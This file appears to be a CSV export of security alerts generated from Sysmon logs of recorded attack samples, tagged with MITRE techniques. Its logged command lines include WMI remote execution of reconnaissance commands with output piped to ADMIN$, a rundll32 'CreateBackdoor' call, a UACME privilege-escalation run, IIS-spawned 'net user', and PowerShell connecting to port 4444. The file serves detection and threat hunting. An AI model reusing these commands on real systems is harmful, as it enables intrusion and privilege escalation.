Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 9813 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.794 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + NT AUTHORITY\SYSTEM + tcp + true + false + 10.0.2.18 + IEWIN7 + 49160 + + false + 10.0.2.19 + + 4444 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578503 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:13.680 + 747F3D96-3A89-607F-0000-001028587700 + 4912 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-82AE-607F-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342406 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:14.798 + 747F3D96-E90A-5F33-0000-0010863C0100 + 1740 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E90A-5F33-0000-00102CF20000 + 1180 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( "c:\windows\system32\cmd.exe" /c net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1044 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.112 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\windows\system32\cmd.exe" /c net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-49D6-5CE7-0000-001020A7A700 + 2580 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" /c net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1044 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.112 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\windows\system32\cmd.exe" /c net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-49D6-5CE7-0000-001020A7A700 + 2580 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5764 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 09:33:57.876 + 747F3D96-A685-5D46-0000-00100D41D703 + 3296 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A685-5D46-0000-00109B2AD703 + 3916 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 55 c:\Windows\SysWOW64\notepad.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 578500 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2021-04-20 20:33:59.834 + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 127.0.0.1 + MSEDGEWIN10 + 49925 + + false + 127.0.0.1 + MSEDGEWIN10 + 445 + microsoft-ds + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 